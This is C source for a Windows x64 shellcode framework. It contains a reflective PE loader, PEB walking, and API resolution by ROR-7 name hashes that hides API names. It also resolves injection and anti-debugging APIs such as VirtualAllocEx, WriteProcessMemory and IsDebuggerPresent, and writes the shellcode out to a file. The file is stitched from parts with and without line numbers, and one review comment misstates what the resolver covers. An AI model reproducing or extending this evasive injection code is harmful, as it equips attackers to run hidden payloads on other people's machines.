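					// import by name: RVA of an IMAGE_IMPORT_BY_NAME (hint + name)
					pImageImportByName = (PIMAGE_IMPORT_BY_NAME)((DWORD64)lpDynPEBuff + pImageOriginalThunkData->u1.Ordinal);
					fpFun = lpData->xGetProcAddress(hInstance, (LPCSTR)pImageImportByName->Name);
				}

				if(fpFun == NULL)
				{
					lpData->xVirtualFree(lpDynPEBuff, 0, MEM_RELEASE);
					return;
				}

				pImageThunkData->u1.Ordinal = (UINT64)fpFun;
			}
		}
	}

	// base relocations: needed whenever we did not land on the preferred ImageBase
	if(pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size > 0)
	{
		ulDifference = (ULONGLONG)lpDynPEBuff - pImageNtHeaders->OptionalHeader.ImageBase;

		pImageBaseRelocation = (PIMAGE_BASE_RELOCATION)((DWORD64)lpDynPEBuff + pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);

		// A block with SizeOfBlock below the header size could never advance
		// the walk, so it ends it instead of spinning forever.
		for(; ulDifference != 0
		      && pImageBaseRelocation->VirtualAddress != 0
		      && pImageBaseRelocation->SizeOfBlock >= sizeof(IMAGE_BASE_RELOCATION); )
		{
			lpMemPage = (char *)((DWORD64)lpDynPEBuff + pImageBaseRelocation->VirtualAddress);

			// number of WORD entries that follow the block header
			lCount = (pImageBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1;
			pRelocationItem = (short int *)((char *)pImageBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));

			for(nIndex = 0; nIndex < lCount; nIndex++)
			{
				nOffset = pRelocationItem[nIndex] & 0x0fff;       // low 12 bits: offset in page
				nType   = (pRelocationItem[nIndex] >> 12) & 0xf;  // high 4 bits: type

				if(nType == IMAGE_REL_BASED_DIR64)
				{
					// the 8-byte target must lie inside the image we own
					if((DWORD64)pImageBaseRelocation->VirtualAddress + nOffset + sizeof(ULONGLONG) > dwImageSize)
					{
						lpData->xVirtualFree(lpDynPEBuff, 0, MEM_RELEASE);
						return;
					}
					*(ULONGLONG*)(lpMemPage + nOffset) += ulDifference;
				}
				// IMAGE_REL_BASED_ABSOLUTE is alignment padding; other types
				// are not emitted for x64 images and are ignored as before.
			}

			pImageBaseRelocation = (PIMAGE_BASE_RELOCATION)(pRelocationItem + lCount);
		}
	}

	// DllMain(hinst, DLL_PROCESS_ATTACH, lpReserved); a DLL may have no entry point
	dwEntryPoint = pImageNtHeaders->OptionalHeader.AddressOfEntryPoint;
	if(dwEntryPoint >= dwImageSize)
	{
		lpData->xVirtualFree(lpDynPEBuff, 0, MEM_RELEASE);
		return;
	}
	if(dwEntryPoint != 0)
	{
		lpDllMain = (DLL_MAIN)((ULONGLONG)lpDynPEBuff + dwEntryPoint);
		lpDllMain((HMODULE)lpDynPEBuff, 1, pShellCodeParam->lpReserved);
	}

	// optional export, looked up in our own mapping since the loader does not know it
	if(pShellCodeParam->lpProcName != NULL)
	{
		RunDll = (pRunDll)MyGetProcAddress((HMODULE)lpDynPEBuff, (LPCSTR)pShellCodeParam->lpProcName);
		if(RunDll)
		{
			RunDll((wchar_t*)pShellCodeParam->lpRunCmd);
		}
	}
}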
307 |
308 |
309 |
310 |
311 |
/*
 * Hash an export name the way the API-hash tables expect: for every byte,
 * rotate the running 32-bit value right by 7 and add the byte.
 *
 * lpszBuffer - NUL-terminated name.
 * Returns the hash; the empty string hashes to 0.
 *
 * The byte is added as a plain (signed) char, so a name containing bytes
 * >= 0x80 sign-extends before the add -- whatever tool generates the hash
 * constants must do the same.
 */
DWORD GetRolHash(char *lpszBuffer)
{
	DWORD dwAcc = 0;
	char *p;

	for(p = lpszBuffer; *p != 0; ++p)
	{
		dwAcc = (dwAcc << 25) | (dwAcc >> 7); // ror 7
		dwAcc += *p;
	}
	return dwAcc;
}
323 |
324 |
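/*
 * Resolve an export by the ROR-7 hash of its name (GetRolHash), so the
 * shellcode never carries API names as plain strings.
 *
 * hModuleBase - base of a loaded module (kernel32, advapi32, psapi, ...).
 * dwNameHash  - GetRolHash() of the wanted export name.
 * lpGetAddr   - optional real GetProcAddress.  When given, the matching
 *               name is re-resolved through it by ordinal, which also
 *               follows forwarded exports.  When NULL the address is taken
 *               straight from the export table (this is how GetProcAddress
 *               itself is found); a forwarded export then yields NULL,
 *               because its table entry is a "DLL.Func" string, not code.
 *
 * Returns the export's address, or NULL when the module has no export
 * directory, no exported name hashes to dwNameHash, or the matched entry
 * cannot be resolved.
 *
 * Fixes over the first version: the name loop stopped at NumberOfNames-1,
 * so the last exported name could never match; an ordinal-table entry
 * beyond NumberOfFunctions, an empty slot and a forwarder are now rejected
 * instead of being turned into a bogus function pointer.
 */
FARPROC Hash_GetProcAddress(HMODULE hModuleBase,DWORD dwNameHash,PVOID lpGetAddr)
{
	FARPROC pRet = NULL;
	TGetProcAddress xGetProcAddress;
	PIMAGE_DOS_HEADER lpDosHeader;
	PIMAGE_NT_HEADERS lpNtHeaders;
	PIMAGE_EXPORT_DIRECTORY lpExports;
	PWORD lpwOrd;
	PDWORD lpdwFunName;
	PDWORD lpdwFunAddr;
	DWORD dwExportVa;
	DWORD dwExportSize;
	DWORD dwFuncRva;
	DWORD dwLoop;

	if(hModuleBase == NULL) return pRet;

	lpDosHeader = (PIMAGE_DOS_HEADER)hModuleBase;
	if(lpDosHeader->e_magic != IMAGE_DOS_SIGNATURE) return pRet;

	lpNtHeaders = (PIMAGE_NT_HEADERS)((DWORD64)hModuleBase + lpDosHeader->e_lfanew);
	if(lpNtHeaders->Signature != IMAGE_NT_SIGNATURE) return pRet;

	dwExportVa   = lpNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
	dwExportSize = lpNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
	if(!dwExportVa || !dwExportSize) return pRet;

	lpExports = (PIMAGE_EXPORT_DIRECTORY)((DWORD64)hModuleBase + dwExportVa);
	if(!lpExports->NumberOfNames) return pRet;

	lpdwFunName = (PDWORD)((DWORD64)hModuleBase + lpExports->AddressOfNames);
	lpwOrd      = (PWORD) ((DWORD64)hModuleBase + lpExports->AddressOfNameOrdinals);
	lpdwFunAddr = (PDWORD)((DWORD64)hModuleBase + lpExports->AddressOfFunctions);

	// every exported name, including the last one
	for(dwLoop = 0; dwLoop < lpExports->NumberOfNames; dwLoop++)
	{
		if(GetRolHash((char *)((DWORD64)hModuleBase + lpdwFunName[dwLoop])) != dwNameHash) continue;

		if(lpGetAddr)
		{
			// ordinal = name-ordinal-table entry + Base, passed as a MAKEINTRESOURCE-style pointer
			xGetProcAddress = (TGetProcAddress)lpGetAddr;
			pRet = xGetProcAddress(hModuleBase, (char *)(DWORD64)(lpwOrd[dwLoop] + lpExports->Base));
		}
		else
		{
			if(lpwOrd[dwLoop] >= lpExports->NumberOfFunctions) break; // corrupt ordinal table
			dwFuncRva = lpdwFunAddr[lpwOrd[dwLoop]];
			if(dwFuncRva == 0) break;                                   // empty slot
			if(dwFuncRva >= dwExportVa && dwFuncRva < dwExportVa + dwExportSize) break; // forwarder string
			pRet = (FARPROC)((DWORD64)hModuleBase + dwFuncRva);
		}
		break; // first hash match wins, as before
	}
	return pRet;
}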
378 |
379 |
380 |
381 |
382 | BOOL GetRing3ApiAddr()
383 | {
384 | HMODULE hModuleBase;
385 | HMODULE hNtdllBase;
386 | HANDLE hPsapiBase;
387 | HANDLE hAdvapi32;
388 | DWORD dw_temp_hash=0;
389 | char advapi32[]={'a','d','v','a','p','i','3','2','.','d','l','l',0};
390 | char psapi[]={'p','s','a','p','i','.','d','l','l',0};
391 | #ifndef HHL_DEBUG
392 | PShellData lpData= (PShellData)((ULONG64)Shellcode_Final_End);//生成shellcode时候恢复回来
393 | #endif
394 |
395 | if(lpData->bIsInitSucess == TRUE)
396 | {
397 | return TRUE;
398 | }
399 |
400 | hModuleBase = (HMODULE)get_kernel32_peb_64();
401 | lpData->base_ker32=hModuleBase;
402 | hNtdllBase =(HMODULE)get_ntdll_peb_64();
403 | lpData->base_ntdll=hNtdllBase;
404 |
405 | if(hModuleBase == NULL || hNtdllBase == NULL)
406 | {
407 | return FALSE;
408 | }
409 |
410 | lpData->xGetProcAddress = (TGetProcAddress) Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xGetProcAddress, NULL);
411 | if(lpData->xGetProcAddress == NULL)
412 | {
413 | return FALSE;
414 | }
415 | lpData->xLoadLibraryA =(TLoadLibraryA) Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xLoadLibraryA, lpData->xGetProcAddress);
416 | if(lpData->xLoadLibraryA == NULL)
417 | {
418 | return FALSE;
419 | }
420 | hPsapiBase=(lpData->xLoadLibraryA)(psapi);// Get Psapi.dll Module Base 如果注入的时机太早这里可能会出问题 load psapi 加载不进来
421 | hAdvapi32=(lpData->xLoadLibraryA)(advapi32);// Get advapi32.dll Module Base 如果注入的时机太早这里可能会出问题 load psapi 加载不进来
422 | lpData->base_psapi=hPsapiBase;
423 | lpData->base_advapi32=hAdvapi32;
424 | lpData->xRegCreateKeyExW=(TRegCreateKeyExW)Hash_GetProcAddress(hAdvapi32,(DWORD)lpData->xRegCreateKeyExW,lpData->xGetProcAddress);
425 | lpData->xRegSetValueExW=(TRegSetValueExW)Hash_GetProcAddress(hAdvapi32,(DWORD)lpData->xRegSetValueExW,lpData->xGetProcAddress);
426 | lpData->xRegSetValueExA=(TRegSetValueExA)Hash_GetProcAddress(hAdvapi32,(DWORD)lpData->xRegSetValueExA,lpData->xGetProcAddress);
427 | lpData->xRegCloseKey=(TRegCloseKey)Hash_GetProcAddress(hAdvapi32,(DWORD)lpData->xRegCloseKey,lpData->xGetProcAddress);
428 | lpData->xRegOpenKeyA=(TRegOpenKeyA)Hash_GetProcAddress(hAdvapi32,(DWORD)lpData->xRegOpenKeyA,lpData->xGetProcAddress);
429 | lpData->xRegOpenKeyExA=(TRegOpenKeyExA)Hash_GetProcAddress(hAdvapi32,(DWORD)lpData->xRegOpenKeyExA,lpData->xGetProcAddress);
430 | lpData->xRegQueryValueExA=(TRegQueryValueExA)Hash_GetProcAddress(hAdvapi32,(DWORD)lpData->xRegQueryValueExA,lpData->xGetProcAddress);
431 | lpData->xRegQueryValueExW=(TRegQueryValueExW)Hash_GetProcAddress(hAdvapi32,(DWORD)lpData->xRegQueryValueExW,lpData->xGetProcAddress);
432 |
433 |
434 | lpData->xGetProcessImageFileNameA=(TGetProcessImageFileNameA)Hash_GetProcAddress(hPsapiBase,(DWORD)lpData->xGetProcessImageFileNameA,lpData->xGetProcAddress);
435 |
436 | lpData->xCreateFileA=(TCreateFileA)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xCreateFileA,lpData->xGetProcAddress);
437 | lpData->xCreateFileW=(TCreateFileW)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xCreateFileW,lpData->xGetProcAddress);
438 | lpData->xCreateFileMappingA=(TCreateFileMappingA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCreateFileMappingA,lpData->xGetProcAddress);
439 | lpData->xCloseHandle=(TCloseHandle)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCloseHandle,lpData->xGetProcAddress);
440 | lpData->xCreateToolhelp32Snapshot=(TCreateToolhelp32Snapshot)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCreateToolhelp32Snapshot,lpData->xGetProcAddress);
441 | lpData->xCheckRemoteDebuggerPresent=(TCheckRemoteDebuggerPresent)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCheckRemoteDebuggerPresent,lpData->xGetProcAddress);
442 | lpData->xCreateHardLinkA=(TCreateHardLinkA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCreateHardLinkA,lpData->xGetProcAddress);
443 | lpData->xCreateHardLinkW=(TCreateHardLinkW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCreateHardLinkW,lpData->xGetProcAddress);
444 | lpData->xCreateDirectoryA=(TCreateDirectoryA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCreateDirectoryA,lpData->xGetProcAddress);
445 | lpData->xCreateDirectoryW=(TCreateDirectoryW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCreateDirectoryW,lpData->xGetProcAddress);
446 |
447 |
448 | lpData->xCopyFileA=(TCopyFileA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCopyFileA,lpData->xGetProcAddress);
449 | lpData->xCopyFileW=(TCopyFileW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCopyFileW,lpData->xGetProcAddress);
450 |
451 | lpData->xDeleteFileA=(TDeleteFileA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xDeleteFileA,lpData->xGetProcAddress);
452 | lpData->xDeleteFileW=(TDeleteFileW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xDeleteFileW,lpData->xGetProcAddress);
453 |
454 | lpData->xFindResourceA=(TFindResourceA)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xFindResourceA,lpData->xGetProcAddress);
455 |
456 | lpData->xGlobalFree=(TGlobalFree)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xGlobalFree,lpData->xGetProcAddress);
457 | lpData->xGetCurrentProcess=(TGetCurrentProcess)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetCurrentProcess,lpData->xGetProcAddress);
458 | lpData->xGetFileSize=(TGetFileSize)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetFileSize,lpData->xGetProcAddress);
459 | lpData->xGetProcessHeap=(TGetProcessHeap)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetProcessHeap,lpData->xGetProcAddress);
460 | lpData->xGetSystemDirectoryA=(TGetSystemDirectoryA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetSystemDirectoryA,lpData->xGetProcAddress);
461 | lpData->xGetSystemDirectoryW=(TGetSystemDirectoryW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetSystemDirectoryW,lpData->xGetProcAddress);
462 | lpData->xGetModuleHandleA=(TGetModuleHandleA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetModuleHandleA,lpData->xGetProcAddress);
463 | lpData->xGetLastError=(TGetLastError)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetLastError,lpData->xGetProcAddress);
464 | lpData->xGetStartupInfoA=(TGetStartupInfoA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetStartupInfoA,lpData->xGetProcAddress);
465 | lpData->xGetTickCount=(TGetTickCount)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetTickCount,lpData->xGetProcAddress);
466 | lpData->xGetCurrentProcessId=(TGetCurrentProcessId)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetCurrentProcessId,lpData->xGetProcAddress);
467 | lpData->xGetNativeSystemInfo=(TGetNativeSystemInfo)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetNativeSystemInfo,lpData->xGetProcAddress);
468 | lpData->xGetModuleFileNameA=(TGetModuleFileNameA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetModuleFileNameA,lpData->xGetProcAddress);
469 | lpData->xGetShortPathNameA=(TGetShortPathNameA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetShortPathNameA,lpData->xGetProcAddress);
470 | lpData->xGetEnvironmentVariableA=(TGetEnvironmentVariableA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetEnvironmentVariableA,lpData->xGetProcAddress);
471 | lpData->xGetEnvironmentVariableW=(TGetEnvironmentVariableW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetEnvironmentVariableW,lpData->xGetProcAddress);
472 | lpData->xGetPrivateProfileStringA=(TGetPrivateProfileStringA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetPrivateProfileStringA,lpData->xGetProcAddress);
473 | lpData->xGetPrivateProfileStringW=(TGetPrivateProfileStringW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetPrivateProfileStringW,lpData->xGetProcAddress);
474 |
475 | lpData->xHeapAlloc=(THeapAlloc)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xHeapAlloc,lpData->xGetProcAddress);
476 | lpData->xHeapFree=(THeapFree)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xHeapFree,lpData->xGetProcAddress);
477 |
478 | lpData->xIsDebuggerPresent=(TIsDebuggerPresent)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xIsDebuggerPresent,lpData->xGetProcAddress);
479 |
480 | lpData->xLoadResource=(TLoadResource)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xLoadResource,lpData->xGetProcAddress);
481 | lpData->xLockResource=(TLockResource)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xLockResource,lpData->xGetProcAddress);
482 |
483 | lpData->xMoveFileA=(TMoveFileA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xMoveFileA,lpData->xGetProcAddress);
484 | lpData->xMoveFileW=(TMoveFileW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xMoveFileW,lpData->xGetProcAddress);
485 | lpData->xMoveFileExA=(TMoveFileExA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xMoveFileExA,lpData->xGetProcAddress);
486 | lpData->xMoveFileExW=(TMoveFileExW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xMoveFileExW,lpData->xGetProcAddress);
487 |
488 | lpData->xMapViewOfFile=(TMapViewOfFile)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xMapViewOfFile,lpData->xGetProcAddress);
489 | lpData->xMultiByteToWideChar=(TMultiByteToWideChar)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xMultiByteToWideChar,lpData->xGetProcAddress);
490 |
491 | lpData->xNtCreateFile=(TNtCreateFile)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xNtCreateFile,lpData->xGetProcAddress);
492 |
493 | lpData->xOutputDebugStringA =(TOutputDebugStringA) Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xOutputDebugStringA,lpData->xGetProcAddress);
494 | lpData->xOpenProcess =(TOpenProcess) Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xOpenProcess,lpData->xGetProcAddress);
495 |
496 | lpData->xProcess32First =(TProcess32First) Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xProcess32First,lpData->xGetProcAddress);
497 | lpData->xProcess32Next =(TProcess32Next) Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xProcess32Next,lpData->xGetProcAddress);
498 |
499 | lpData->xReadFile=(TReadFile)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xReadFile,lpData->xGetProcAddress);
500 | lpData->xRtlInitAnsiString=(TRtlInitAnsiString)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlInitAnsiString,lpData->xGetProcAddress);
501 | lpData->xRtlAnsiStringToUnicodeString=(TRtlAnsiStringToUnicodeString)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlAnsiStringToUnicodeString,lpData->xGetProcAddress);
502 | lpData->xRtlAllocateHeap=(TRtlAllocateHeap)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlAllocateHeap,lpData->xGetProcAddress);
503 | lpData->xRtlFreeHeap=(TRtlFreeHeap)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlFreeHeap,lpData->xGetProcAddress);
504 | lpData->xRtlGetVersion=(TRtlGetVersion)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlGetVersion,lpData->xGetProcAddress);//xRtlFreeUnicodeString
505 | lpData->xRtlFreeUnicodeString=(TRtlFreeUnicodeString)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlFreeUnicodeString,lpData->xGetProcAddress);
506 | lpData->xRtlZeroMemory=(TRtlZeroMemory)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlZeroMemory,lpData->xGetProcAddress);
507 | lpData->xRtlImageDirectoryEntryToData=(TRtlImageDirectoryEntryToData)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlImageDirectoryEntryToData,lpData->xGetProcAddress);
508 |
509 | lpData->xRtlFormatCurrentUserKeyPath=(TRtlFormatCurrentUserKeyPath)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlFormatCurrentUserKeyPath,lpData->xGetProcAddress);
510 | lpData->xReadProcessMemory=(TReadProcessMemory)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xReadProcessMemory,lpData->xGetProcAddress);
511 |
512 | lpData->xSizeofResource=(TSizeofResource)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xSizeofResource,lpData->xGetProcAddress);
513 | lpData->xSleep=(TSleep)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xSleep,lpData->xGetProcAddress);
514 | lpData->xSetFilePointer=(TSetFilePointer)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xSetFilePointer,lpData->xGetProcAddress);
515 |
516 | lpData->xUnmapViewOfFile=(TUnmapViewOfFile)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xUnmapViewOfFile,lpData->xGetProcAddress);
517 |
518 | lpData->xVirtualAlloc=(TVirtualAlloc)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xVirtualAlloc,lpData->xGetProcAddress);
519 | lpData->xVirtualFree=(TVirtualFree)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xVirtualFree,lpData->xGetProcAddress);
520 |
521 | lpData->xVirtualAllocEx=(TVirtualAllocEx)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xVirtualAllocEx,lpData->xGetProcAddress);
522 | lpData->xVirtualFreeEx=(TVirtualFreeEx)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xVirtualFreeEx,lpData->xGetProcAddress);
523 | lpData->xVirtualProtectEx=(TVirtualProtectEx)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xVirtualProtectEx,lpData->xGetProcAddress);
524 | lpData->xVirtualProtect=(TVirtualProtect)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xVirtualProtect,lpData->xGetProcAddress);
525 |
526 | lpData->xWideCharToMultiByte=(TWideCharToMultiByte)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xWideCharToMultiByte,lpData->xGetProcAddress);
527 | lpData->xWriteFile=(TWriteFile)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xWriteFile,lpData->xGetProcAddress);
528 | lpData->xWinExec=(TWinExec)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xWinExec,lpData->xGetProcAddress);
529 | lpData->xWriteProcessMemory=(TWriteProcessMemory)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xWriteProcessMemory,lpData->xGetProcAddress);
530 |
531 | lpData->xZwQuerySystemInformation=(TZwQuerySystemInformation)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xZwQuerySystemInformation,lpData->xGetProcAddress);
532 | lpData->bIsInitSucess = TRUE;
533 | return TRUE;
534 | }
535 |
536 |
/*
 * InitApiHashToStruct - seed the global ShellData with per-API name hashes.
 *
 * Every xFoo function-pointer field is first loaded with a 32-bit hash of
 * the API name; the resolver above (Hash_GetProcAddress over hModuleBase /
 * hNtdllBase, keyed by ShellData.xGetProcAddress) later overwrites the hash
 * with the real address and sets bIsInitSucess. The constants are project
 * values and must match the hash routine that resolver uses.
 *
 * NOTE(review): several fields seeded here (the xReg* group,
 * xGetProcessImageFileNameA, xLoadLibraryA) do not appear in the visible part
 * of the resolver; if they are not resolved elsewhere they keep the raw hash
 * and must not be called through. Confirm against the full resolver.
 *
 * Outside HHL_DEBUG builds the function also copies the code range
 * [Shellcode_Final_Start, Shellcode_Final_End) followed by a copy of
 * ShellData into one buffer and writes it to the hard-coded path
 * "c:\\64shellcode.bin". The byte count returned by WriteFile (dwBytes) is
 * never compared with dwShellCodeSize, so a short write still prints
 * "Save ShellCode Success."; errors from CreateFileA/WriteFile are not
 * reported at all.
 *
 * Locals dw_error and b1 are never used; hFile, dwBytes, dwSize,
 * dwShellCodeSize and lpBuffer are used only in the #ifndef HHL_DEBUG branch.
 */
void InitApiHashToStruct()
{

    HANDLE hFile;
    DWORD dwBytes, dwSize,dwShellCodeSize;
    PUCHAR lpBuffer;
    DWORD dw_error=0;
    BOOL b1=0;


    ZeroMemory(&ShellData,sizeof(TShellData));

    /* Stays FALSE until the resolver has replaced every hash with an address. */
    ShellData.bIsInitSucess = FALSE;

    //Fill the hashes of the API name strings into the global ShellData struct.
    ShellData.xCreateFileA=(TCreateFileA)0x94e43293;//
    ShellData.xCreateFileW=(TCreateFileW)0x94e432a9;
    ShellData.xCreateFileMappingA=(TCreateFileMappingA)0x014b19c2;
    ShellData.xCloseHandle=(TCloseHandle)0xff0d6657;//
    ShellData.xCreateToolhelp32Snapshot=(TCreateToolhelp32Snapshot)0x3cc0153d;
    ShellData.xCheckRemoteDebuggerPresent=(TCheckRemoteDebuggerPresent)0x1a2789fe;
    ShellData.xCreateHardLinkA=(TCreateHardLinkA)0x77a742b;
    ShellData.xCreateHardLinkW=(TCreateHardLinkW)0x77a7441;
    ShellData.xCopyFileA=(TCopyFileA)0x7eb0fb1;
    ShellData.xCopyFileW=(TCopyFileW)0x7eb0fc7;
    ShellData.xCreateDirectoryA=(TCreateDirectoryA)0xa66b05d4;
    ShellData.xCreateDirectoryW=(TCreateDirectoryW)0xa66b05ea;

    ShellData.xDeleteFileA=(TDeleteFileA)0x98e63979;
    ShellData.xDeleteFileW=(TDeleteFileW)0x98e6398f;

    ShellData.xFindResourceA=(TFindResourceA)0x83ceca69;

    ShellData.xGlobalFree=(TGlobalFree)0x048223c0;
    /* xGetProcAddress is the seed the resolver passes as its third argument. */
    ShellData.xGetProcAddress = (TGetProcAddress)0xbbafdf85;
    ShellData.xGetCurrentProcess=(TGetCurrentProcess)0x3a2fe6bb;
    ShellData.xGetFileSize=(TGetFileSize)0xac0a138e;
    ShellData.xGetProcessHeap=(TGetProcessHeap)0x80ae9074;
    ShellData.xGetSystemDirectoryA=(TGetSystemDirectoryA)0x8e6902b2;
    ShellData.xGetSystemDirectoryW=(TGetSystemDirectoryW)0x8e6902c8;
    ShellData.xGetModuleHandleA=(TGetModuleHandleA)0xf4e2f2b2;
    ShellData.xGetProcessImageFileNameA=(TGetProcessImageFileNameA)0x34ef0e5a;
    ShellData.xGetLastError=(TGetLastError)0x12f461bb;
    ShellData.xGetStartupInfoA=(TGetStartupInfoA)0x8fb53455;
    ShellData.xGetTickCount=(TGetTickCount)0xed04519b;
    ShellData.xGetCurrentProcessId=(TGetCurrentProcessId)0x2cece924;
    ShellData.xGetNativeSystemInfo=(TGetNativeSystemInfo)0x8a1fb2a8;
    ShellData.xGetModuleFileNameA=(TGetModuleFileNameA)0xb4ffafed;
    ShellData.xGetShortPathNameA=(TGetShortPathNameA)0xe72d6895;
    ShellData.xGetEnvironmentVariableA=(TGetEnvironmentVariableA)0xec496a9e;
    ShellData.xGetEnvironmentVariableW=(TGetEnvironmentVariableW)0xec496ab4;
    ShellData.xGetPrivateProfileStringA=(TGetPrivateProfileStringA)0x8f9ded68;
    ShellData.xGetPrivateProfileStringW=(TGetPrivateProfileStringW)0x8f9ded7e;


    ShellData.xHeapAlloc=(THeapAlloc)0xf8262c81;
    ShellData.xHeapFree=(THeapFree)0x052e3772;

    ShellData.xIsDebuggerPresent=(TIsDebuggerPresent)0xb483154;

    ShellData.xLoadResource=(TLoadResource)0xff951427;
    ShellData.xLockResource=(TLockResource)0xff951b2b;
    ShellData.xLoadLibraryA = (TLoadLibraryA)0x0c917432;

    ShellData.xMapViewOfFile=(TMapViewOfFile)0x9aa5f07d;
    ShellData.xMultiByteToWideChar=(TMultiByteToWideChar)0x70229207;
    ShellData.xMoveFileA=(TMoveFileA)0x896b19ae;
    ShellData.xMoveFileW=(TMoveFileW)0x896b19c4;
    ShellData.xMoveFileExA=(TMoveFileExA)0x56ca25ee;
    ShellData.xMoveFileExW=(TMoveFileExW)0x56ca2604;

    ShellData.xNtCreateFile=(TNtCreateFile)0x4489294c;

    ShellData.xOutputDebugStringA = (TOutputDebugStringA)0x354c31f2;
    ShellData.xOpenProcess=(TOpenProcess)0x77ce8553;

    ShellData.xProcess32First=(TProcess32First)0xc4446aa6;
    ShellData.xProcess32Next=(TProcess32Next)0x2e255963;

    ShellData.xRtlGetVersion=(TRtlGetVersion)0x4907252b;
    ShellData.xRtlFreeUnicodeString=(TRtlFreeUnicodeString)0x07d63e06;
    ShellData.xRtlZeroMemory=(TRtlZeroMemory)0x555df489;
    ShellData.xRtlInitAnsiString=(TRtlInitAnsiString)0x65c26f71;
    ShellData.xRtlAnsiStringToUnicodeString=(TRtlAnsiStringToUnicodeString)0x199548c2;
    ShellData.xRtlAllocateHeap=(TRtlAllocateHeap)0x8e17053d;
    ShellData.xRtlFreeHeap=(TRtlFreeHeap)0xc839b3b6;
    ShellData.xRtlImageDirectoryEntryToData=(TRtlImageDirectoryEntryToData)0xc1eb7ae3;
    ShellData.xReadFile=(TReadFile)0x130f36b2;
    ShellData.xReadProcessMemory=(TReadProcessMemory)0xd5206133;


    ShellData.xRtlFormatCurrentUserKeyPath=(TRtlFormatCurrentUserKeyPath)0x29640660;
    ShellData.xRegCreateKeyExW=(TRegCreateKeyExW)0xb4b0ad31;
    ShellData.xRegSetValueExW=(TRegSetValueExW)0xd8c0fec0;
    ShellData.xRegCloseKey=(TRegCloseKey)0xe511783;
